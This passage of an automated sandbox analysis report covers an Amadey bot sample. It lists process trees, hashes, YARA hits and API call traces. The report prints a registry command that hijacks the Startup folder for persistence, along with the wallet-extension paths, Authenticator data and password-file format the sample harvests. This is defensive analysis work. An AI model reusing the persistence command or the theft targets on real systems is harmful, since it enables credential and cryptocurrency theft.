                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                          Commandline:timeout /t 6
                                                                                                                                          Imagebase:0x1360000
                                                                                                                                          File size:26112 bytes
                                                                                                                                          MD5 hash:121A4EDAE60A7AF6F5DFA82F7BB95659
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Reputation:high

                                                                                                                                          Chronological Activities

                                                                                                                                          Analysis Process: blfte.exe PID: 5756 Parent PID: 6780

                                                                                                                                          General

                                                                                                                                          Start time:22:59:03
                                                                                                                                          Start date:28/04/2021
                                                                                                                                          Path:C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                          Commandline:'C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe'
                                                                                                                                          Imagebase:0x400000
                                                                                                                                          File size:290304 bytes
                                                                                                                                          MD5 hash:31AB82365078548DCEA62DA7C2380B2E
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Yara matches:
                                                                                                                                          • Rule: JoeSecurity_Amadey, Description: Yara detected Amadey bot, Source: 0000000A.00000002.923993621.00000000006DF000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                          Antivirus matches:
                                                                                                                                          • Detection: 100%, Joe Sandbox ML
                                                                                                                                          Reputation:low

                                                                                                                                          Chronological Activities

                                                                                                                                          Analysis Process: cmd.exe PID: 6796 Parent PID: 5756

                                                                                                                                          General

                                                                                                                                          Start time:22:59:09
                                                                                                                                          Start date:28/04/2021
                                                                                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                          Commandline:'C:\Windows\System32\cmd.exe' /C REG ADD 'HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders' /f /v Startup /t REG_SZ /d C:\Users\user\AppData\Local\Temp\e90e419c61\
                                                                                                                                          Imagebase:0x11d0000
                                                                                                                                          File size:232960 bytes
                                                                                                                                          MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Reputation:high

                                                                                                                                          Chronological Activities

                                                                                                                                          Analysis Process: conhost.exe PID: 6820 Parent PID: 6796

                                                                                                                                          General

                                                                                                                                          Start time:22:59:09
                                                                                                                                          Start date:28/04/2021
                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                          Imagebase:0x7ff724c50000
                                                                                                                                          File size:625664 bytes
                                                                                                                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Reputation:high

                                                                                                                                          Chronological Activities

                                                                                                                                          Analysis Process: reg.exe PID: 6828 Parent PID: 6796

                                                                                                                                          General

                                                                                                                                          Start time:22:59:09
                                                                                                                                          Start date:28/04/2021
                                                                                                                                          Path:C:\Windows\SysWOW64\reg.exe
                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                          Commandline:REG ADD 'HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders' /f /v Startup /t REG_SZ /d C:\Users\user\AppData\Local\Temp\e90e419c61\
                                                                                                                                          Imagebase:0xcb0000
                                                                                                                                          File size:59392 bytes
                                                                                                                                          MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Reputation:high

                                                                                                                                          Chronological Activities

                                                                                                                                          Analysis Process: rundll32.exe PID: 6248 Parent PID: 5756

                                                                                                                                          General

                                                                                                                                          Start time:22:59:20
                                                                                                                                          Start date:28/04/2021
                                                                                                                                          Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                          Commandline:'C:\Windows\System32\rundll32.exe' C:\ProgramData\1a9f26b569d5df\cred.dll, Main
                                                                                                                                          Imagebase:0xa0000
                                                                                                                                          File size:61952 bytes
                                                                                                                                          MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:Borland Delphi
                                                                                                                                          Reputation:high

                                                                                                                                          Chronological Activities

                                                                                                                                          Analysis Process: rundll32.exe PID: 1380 Parent PID: 5756

                                                                                                                                          General

                                                                                                                                          Start time:22:59:30
                                                                                                                                          Start date:28/04/2021
                                                                                                                                          Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                          Commandline:'C:\Windows\System32\rundll32.exe' C:\ProgramData\1a9f26b569d5df\scr.dll, Main
                                                                                                                                          Imagebase:0xa0000
                                                                                                                                          File size:61952 bytes
                                                                                                                                          MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:Borland Delphi
                                                                                                                                          Reputation:high

                                                                                                                                          Chronological Activities

                                                                                                                                          Disassembly

                                                                                                                                          Code Analysis

                                                                                                                                          Reset < >

                                                                                                                                            Analysis Process: wKYTg7Gp6P.exe PID: 6924 Parent PID: 5932 wKYTg7Gp6P.exeCOMMON

                                                                                                                                            Executed Functions

                                                                                                                                            Function 00404905, Relevance: 56.6, APIs: 31, Strings: 1, Instructions: 602stringfileCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • __EH_prolog3.LIBCMT ref: 00404924
                                                                                                                                            • _memset.LIBCMT ref: 00404953
                                                                                                                                            • _memset.LIBCMT ref: 00404966
                                                                                                                                            • _memset.LIBCMT ref: 00404974
                                                                                                                                            • _memset.LIBCMT ref: 00404982
                                                                                                                                            • lstrcpyW.KERNEL32(?,?), ref: 00404992
                                                                                                                                            • lstrcatW.KERNEL32(?,\*.*), ref: 004049A4
                                                                                                                                            • FindFirstFileW.KERNELBASE(?,00000000,?,?,?,?,?,?,?,?,?,?,?,00000018), ref: 004049B5
                                                                                                                                            • lstrcpyW.KERNEL32(?,?), ref: 004049C8
                                                                                                                                            • lstrcatW.KERNEL32(?,00481858), ref: 004049DB
                                                                                                                                            • lstrcatW.KERNEL32(?,?), ref: 004049EC
                                                                                                                                            • lstrcpyW.KERNEL32(?,?), ref: 004049FC
                                                                                                                                            • lstrcatW.KERNEL32(?,00481858), ref: 00404A10
                                                                                                                                            • lstrcatW.KERNEL32(?,?), ref: 00404A1D
                                                                                                                                            • lstrcmpW.KERNEL32(?,00481854,?,?,?,?,?,?,?,?,?,?,?,00000018), ref: 00404A34
                                                                                                                                            • lstrcmpW.KERNEL32(?,0048184C,?,?,?,?,?,?,?,?,?,?,?,00000018), ref: 00404A47
                                                                                                                                            • PathMatchSpecW.SHLWAPI(?,00000000,00000001,00000000,?), ref: 00404B12
                                                                                                                                            • PathMatchSpecW.SHLWAPI(?,00000000), ref: 00404F0E
                                                                                                                                              • Part of subcall function 004028A4: _memmove.LIBCMT ref: 004028C6
                                                                                                                                              • Part of subcall function 0045D04F: CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0045D06A
                                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00404F43
                                                                                                                                              • Part of subcall function 0045EBF9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000), ref: 0045EC2A
                                                                                                                                              • Part of subcall function 0045EBF9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 0045EC4D
                                                                                                                                            • FindNextFileW.KERNELBASE(?,00000000,00000001,00000000), ref: 0040506C
                                                                                                                                            • FindClose.KERNEL32(?), ref: 0040507D
                                                                                                                                            • _memset.LIBCMT ref: 0040508D
                                                                                                                                            • _memset.LIBCMT ref: 0040509B
                                                                                                                                            • _memset.LIBCMT ref: 004050A9
                                                                                                                                            • _memset.LIBCMT ref: 004050B7
                                                                                                                                            • _memset.LIBCMT ref: 00405108
                                                                                                                                            • _memset.LIBCMT ref: 00405116
                                                                                                                                            • _memset.LIBCMT ref: 00405124
                                                                                                                                            • _memset.LIBCMT ref: 00405132
                                                                                                                                            • FindClose.KERNEL32(00000008), ref: 0040513D
                                                                                                                                              • Part of subcall function 00404905: DeleteFileW.KERNEL32(?,00000001,00000000,00000001,00000000,00000001,00000000,00000001,00000000,?,00000001,00000000), ref: 00404C19
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _memset$lstrcat$FileFind$lstrcpy$ByteCharCloseMatchMultiPathSpecWidelstrcmp$CreateDeleteFirstH_prolog3NextUnothrow_t@std@@@__ehfuncinfo$??2@_memmove
                                                                                                                                            • String ID: \*.*
                                                                                                                                            • API String ID: 2798174453-1173974218
                                                                                                                                            • Opcode ID: a1b104165f90e88d391731eca65dee25fcaee8f7f46ddfb891e8c10f64540eb8
                                                                                                                                            • Instruction ID: 7e951b701872478bf3f71432b7157aed566a783cad06ae2a4b03e78ec1401cc7
                                                                                                                                            • Opcode Fuzzy Hash: a1b104165f90e88d391731eca65dee25fcaee8f7f46ddfb891e8c10f64540eb8
                                                                                                                                            • Instruction Fuzzy Hash: 003239B1401189AEDF21EF90DC88EEE777CFF54309F14053BE909A6191EB399A44CB69
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 00405437, Relevance: 53.8, APIs: 6, Strings: 24, Instructions: 1270fileCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • __EH_prolog3.LIBCMT ref: 00405456
                                                                                                                                            • _sprintf.LIBCMT ref: 0040547F
                                                                                                                                            • FindFirstFileA.KERNELBASE(?,00000000,?,?,00000018), ref: 00405492
                                                                                                                                            • _sprintf.LIBCMT ref: 004054E1
                                                                                                                                              • Part of subcall function 004658EA: __output_l.LIBCMT ref: 00465945
                                                                                                                                              • Part of subcall function 00405156: __EH_prolog3.LIBCMT ref: 00405175
                                                                                                                                              • Part of subcall function 00405156: _sprintf.LIBCMT ref: 004051B1
                                                                                                                                              • Part of subcall function 00405156: FindFirstFileA.KERNEL32(?,00000000,?,?,00000014), ref: 004051C4
                                                                                                                                              • Part of subcall function 004025E8: _memmove.LIBCMT ref: 00402607
                                                                                                                                              • Part of subcall function 00402CCF: _memmove.LIBCMT ref: 00402D20
                                                                                                                                              • Part of subcall function 00405156: _sprintf.LIBCMT ref: 0040522A
                                                                                                                                              • Part of subcall function 00405156: CopyFileA.KERNEL32 ref: 004053AE
                                                                                                                                              • Part of subcall function 00405156: FindNextFileA.KERNEL32(?,00000000,?,?,00000014), ref: 004053DF
                                                                                                                                              • Part of subcall function 00405156: FindClose.KERNEL32(?,?,?,00000014), ref: 004053F0
                                                                                                                                            • FindNextFileA.KERNELBASE(?,00000000,?,?,00000018), ref: 00406536
                                                                                                                                            • FindClose.KERNEL32(?,?,?,00000018), ref: 00406547
                                                                                                                                            Strings
                                                                                                                                            • \Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp, xrefs: 004059DB
                                                                                                                                            • %s\%s, xrefs: 004054DB
                                                                                                                                            • Wallets, xrefs: 0040569E, 004058A0, 00405AA2, 00405CA4, 00405EA6, 004060A8
                                                                                                                                            • BinanceChainWallet, xrefs: 00405A81, 00406087
                                                                                                                                            • \Sync Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec, xrefs: 00405BDD
                                                                                                                                            • TronLink, xrefs: 0040567D, 00405C83
                                                                                                                                            • \Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai\CURRENT, xrefs: 004062FF
                                                                                                                                            • MetaMask, xrefs: 0040587F, 00405E85
                                                                                                                                            • \Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai\CURRENT, xrefs: 004060FD
                                                                                                                                            • \Sync Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn, xrefs: 00405DDF
                                                                                                                                            • %s\*, xrefs: 00405474
                                                                                                                                            • Plugins, xrefs: 004062AA, 004064AC
                                                                                                                                            • \Sync Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn\CURRENT, xrefs: 00405CF9
                                                                                                                                            • \Sync Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp\CURRENT, xrefs: 00405EFB
                                                                                                                                            • \Sync Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec\CURRENT, xrefs: 00405AF7
                                                                                                                                            • \Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai, xrefs: 004063E5
                                                                                                                                            • \Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec\CURRENT, xrefs: 004054EE
                                                                                                                                            • \Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn\CURRENT, xrefs: 004056F3
                                                                                                                                            • \Sync Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp, xrefs: 00405FE1
                                                                                                                                            • \Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp\CURRENT, xrefs: 004058F5
                                                                                                                                            • \Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec, xrefs: 004055D7
                                                                                                                                            • \Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn, xrefs: 004057D9
                                                                                                                                            • \Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai, xrefs: 004061E3
                                                                                                                                            • Authenticator, xrefs: 00406289, 0040648B
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Find$File$_sprintf$CloseFirstH_prolog3Next_memmove$Copy__output_l
                                                                                                                                            • String ID: %s\%s$%s\*$Authenticator$BinanceChainWallet$MetaMask$Plugins$TronLink$Wallets$\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai$\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai\CURRENT$\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp$\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp\CURRENT$\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec$\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec\CURRENT$\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn$\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn\CURRENT$\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai$\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai\CURRENT$\Sync Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp$\Sync Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp\CURRENT$\Sync Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec$\Sync Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec\CURRENT$\Sync Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn$\Sync Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn\CURRENT
                                                                                                                                            • API String ID: 4158272174-3778960471
                                                                                                                                            • Opcode ID: 13287aae50373c5713009a8c0f6b830647efe450f876ad715b8526480c75b18e
                                                                                                                                            • Instruction ID: 8fc455913da9e46366c38a0d3bffcb6f635551091eb70b688b8786d60db2637e
                                                                                                                                            • Opcode Fuzzy Hash: 13287aae50373c5713009a8c0f6b830647efe450f876ad715b8526480c75b18e
                                                                                                                                            • Instruction Fuzzy Hash: 6CB262B140418CEEEF25EF64CD59EDE3BB8AF15308F10416FE909AB291DA745B08CB65
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 0045F4A8, Relevance: 52.7, APIs: 35, Instructions: 155libraryloaderCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • LoadLibraryA.KERNEL32(00000001,?,?,00000000,00407555), ref: 0045F4B2
                                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0045F4CB
                                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0045F4D9
                                                                                                                                            • LoadLibraryA.KERNEL32(?,?,00000000,00407555), ref: 0045F4E6
                                                                                                                                            • LoadLibraryA.KERNEL32(?,?,00000000,00407555), ref: 0045F4F4
                                                                                                                                            • LoadLibraryA.KERNEL32(?,?,00000000,00407555), ref: 0045F502
                                                                                                                                            • LoadLibraryA.KERNEL32(?,?,00000000,00407555), ref: 0045F510
                                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0045F523
                                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0045F535
                                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0045F547
                                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0045F559
                                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0045F56B
                                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0045F57D
                                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0045F593
                                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0045F5A5
                                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0045F5BF
                                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0045F5D1
                                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0045F5E3
                                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0045F5F5
                                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0045F607
                                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0045F619
                                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0045F62B
                                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0045F63D
                                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0045F64F
                                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0045F669
                                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0045F67B
                                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0045F68D
                                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0045F69F
                                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0045F6B1
                                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0045F6C3
                                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0045F6D5
                                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0045F6E7
                                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0045F6F9
                                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0045F70B
                                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0045F71D
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AddressProc$LibraryLoad
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2238633743-0
                                                                                                                                            • Opcode ID: 05bff53e6134c1f716bd3162193623c11295c8a80d25f379ea98afbe6f5d2d35
                                                                                                                                            • Instruction ID: 3073bef44f531f1abf62cd30824c753cddedc3f3a5cf641c41f7437fd942922d
                                                                                                                                            • Opcode Fuzzy Hash: 05bff53e6134c1f716bd3162193623c11295c8a80d25f379ea98afbe6f5d2d35
                                                                                                                                            • Instruction Fuzzy Hash: 38615CB6469A10AFDB025F68EC4883A3FB9FB79261306557BF90182230DB354815EF5D
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 00406917, Relevance: 39.3, APIs: 8, Strings: 14, Instructions: 800COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • _strtok.LIBCMT ref: 0040697B
                                                                                                                                            • _strtok.LIBCMT ref: 00406A3D
                                                                                                                                              • Part of subcall function 00404872: __EH_prolog3.LIBCMT ref: 00404879
                                                                                                                                              • Part of subcall function 00403FCA: _memmove.LIBCMT ref: 00403FEC
                                                                                                                                              • Part of subcall function 004025E8: _memmove.LIBCMT ref: 00402607
                                                                                                                                            • __wgetenv.LIBCMT ref: 00406BA3
                                                                                                                                            • __wgetenv.LIBCMT ref: 00406C41
                                                                                                                                            • GetLogicalDriveStringsA.KERNEL32 ref: 00406E82
                                                                                                                                            • _strtok.LIBCMT ref: 00406EB7
                                                                                                                                            • GetDriveTypeA.KERNEL32(?,00000001,00000000), ref: 00406F1D
                                                                                                                                              • Part of subcall function 0045C174: GetUserNameA.ADVAPI32(?,?), ref: 0045C1A9
                                                                                                                                              • Part of subcall function 0045F006: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000), ref: 0045F035
                                                                                                                                              • Part of subcall function 0045F006: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 0045F064
                                                                                                                                            • _strtok.LIBCMT ref: 004072F4
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _strtok$ByteCharDriveMultiWide__wgetenv_memmove$H_prolog3LogicalNameStringsTypeUser
                                                                                                                                            • String ID: %APPDATA%$%C%$%DESKTOP%$%DOCUMENTS%$%DRIVE_FIXED%$%DRIVE_REMOVABLE%$%LOCALAPPDATA%$.zip$APPDATA$C:\$C:\Users\$LOCALAPPDATA$\Desktop$\Documents
                                                                                                                                            • API String ID: 1597689408-2603015269
                                                                                                                                            • Opcode ID: 2c2b2e6c72d265e28c70a93697f6b7011efe5e8f3770a9cd2c68d410d3e7ae6d
                                                                                                                                            • Instruction ID: 6949d2d89de484f3ee6934440156e39bbf506fdbc8bb7c0a6bc2a633909d9a13
                                                                                                                                            • Opcode Fuzzy Hash: 2c2b2e6c72d265e28c70a93697f6b7011efe5e8f3770a9cd2c68d410d3e7ae6d
                                                                                                                                            • Instruction Fuzzy Hash: 84629571900248AEDF14EFA4CD56BEE7BB8AF15304F14406EF805A72D2DB785B09C7A6
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 0040EBA8, Relevance: 38.7, APIs: 16, Strings: 6, Instructions: 245libraryloaderCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • LoadLibraryA.KERNEL32(?,00000000), ref: 0040EBD9
                                                                                                                                            • GetProcAddress.KERNEL32(00000000,004940CC), ref: 0040EBFA
                                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0040EC08
                                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0040EC16
                                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0040EC24
                                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0040EC32
                                                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00000100,00000000,00000000,00000001,00000000,passwords.txt,?,00000000), ref: 0040ED41
                                                                                                                                            • _fprintf.LIBCMT ref: 0040ED52
                                                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,-00000010,000000FF,?,00000100,00000000,00000000,?,?,00000000), ref: 0040ED6F
                                                                                                                                            • _fprintf.LIBCMT ref: 0040ED7D
                                                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00000100,00000000,00000000,?,?,?,?,?,00000000), ref: 0040ED9D
                                                                                                                                            • _fprintf.LIBCMT ref: 0040EDAE
                                                                                                                                            • _fprintf.LIBCMT ref: 0040EDDF
                                                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00000100,00000000,00000000), ref: 0040EE00
                                                                                                                                            • _fprintf.LIBCMT ref: 0040EE11
                                                                                                                                            • FreeLibrary.KERNEL32(00000000,?,00000000), ref: 0040EE6F
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AddressProc_fprintf$ByteCharMultiWide$Library$FreeLoad
                                                                                                                                            • String ID: Host: %s$Login: %s$Password: $Password: %s$Soft: %s$passwords.txt
                                                                                                                                            • API String ID: 1561987134-3130916318
                                                                                                                                            • Opcode ID: 3580a22743fb7af718ac259720d8d09f3ea270d3498e48827d705d7f1628f1c3
                                                                                                                                            • Instruction ID: dd8858541897c18191fe165566708e9316b130cd41216e4fcf80ce6b7a1597ba
                                                                                                                                            • Opcode Fuzzy Hash: 3580a22743fb7af718ac259720d8d09f3ea270d3498e48827d705d7f1628f1c3
                                                                                                                                            • Instruction Fuzzy Hash: 298149B2D1020CAFDB11DFA5DC85DAEBBB9FB08314F14053AE909A7291E7359954CF28
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 0040F998, Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 193fileCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • __EH_prolog3.LIBCMT ref: 0040F9B7
                                                                                                                                              • Part of subcall function 004046E9: __EH_prolog3.LIBCMT ref: 004046F0
                                                                                                                                            • __wgetenv.LIBCMT ref: 0040F9FD
                                                                                                                                            • _sprintf.LIBCMT ref: 0040FA38
                                                                                                                                            • FindFirstFileA.KERNELBASE(?,00000000,?,?,00000000), ref: 0040FA4B
                                                                                                                                            • _sprintf.LIBCMT ref: 0040FA9B
                                                                                                                                              • Part of subcall function 004658EA: __output_l.LIBCMT ref: 00465945
                                                                                                                                            • _sprintf.LIBCMT ref: 0040FAC4
                                                                                                                                              • Part of subcall function 004658EA: __flsbuf.LIBCMT ref: 00465960
                                                                                                                                            • _sprintf.LIBCMT ref: 0040FAD3
                                                                                                                                            • PathMatchSpecA.SHLWAPI(?,00000010,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040FAE2
                                                                                                                                            • CreateDirectoryA.KERNEL32(00000000,00000000), ref: 0040FB2A
                                                                                                                                            • CopyFileA.KERNEL32 ref: 0040FB91
                                                                                                                                            • FindNextFileA.KERNEL32(?,00000000,?,?,00000000), ref: 0040FBD5
                                                                                                                                            • FindClose.KERNEL32(?,?,?,00000000), ref: 0040FBE6
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _sprintf$FileFind$H_prolog3$CloseCopyCreateDirectoryFirstMatchNextPathSpec__flsbuf__output_l__wgetenv
                                                                                                                                            • String ID: %s\%s$%s\*
                                                                                                                                            • API String ID: 457607895-2848263008
                                                                                                                                            • Opcode ID: 2dae6fdd5d3c37646e4496610cda33381e5741e3e3f9565541d04ef970f887e7
                                                                                                                                            • Instruction ID: a82faa7f398618fda16baa1a62e0cc79a34c08695d3cedeba6541ee043000394
                                                                                                                                            • Opcode Fuzzy Hash: 2dae6fdd5d3c37646e4496610cda33381e5741e3e3f9565541d04ef970f887e7
                                                                                                                                            • Instruction Fuzzy Hash: 5C7130B1900248ABDB25EF65CD59EDE37BCEF15304F00443BF909A7191E7799608CB69
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 0040657E, Relevance: 21.2, APIs: 10, Strings: 2, Instructions: 156fileCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • __EH_prolog3.LIBCMT ref: 0040659D
                                                                                                                                            • _sprintf.LIBCMT ref: 004065CE
                                                                                                                                            • FindFirstFileA.KERNELBASE(?,00000000,?,?,00000014), ref: 004065E1
                                                                                                                                            • _sprintf.LIBCMT ref: 00406631
                                                                                                                                              • Part of subcall function 004658EA: __output_l.LIBCMT ref: 00465945
                                                                                                                                            • _sprintf.LIBCMT ref: 0040665A
                                                                                                                                              • Part of subcall function 004658EA: __flsbuf.LIBCMT ref: 00465960
                                                                                                                                            • _sprintf.LIBCMT ref: 00406669
                                                                                                                                            • PathMatchSpecA.SHLWAPI(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000014), ref: 00406678
                                                                                                                                            • CopyFileA.KERNEL32 ref: 004066FC
                                                                                                                                            • FindNextFileA.KERNEL32(?,00000000,?,?,00000014), ref: 0040675E
                                                                                                                                            • FindClose.KERNEL32(?,?,?,00000014), ref: 0040676F
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
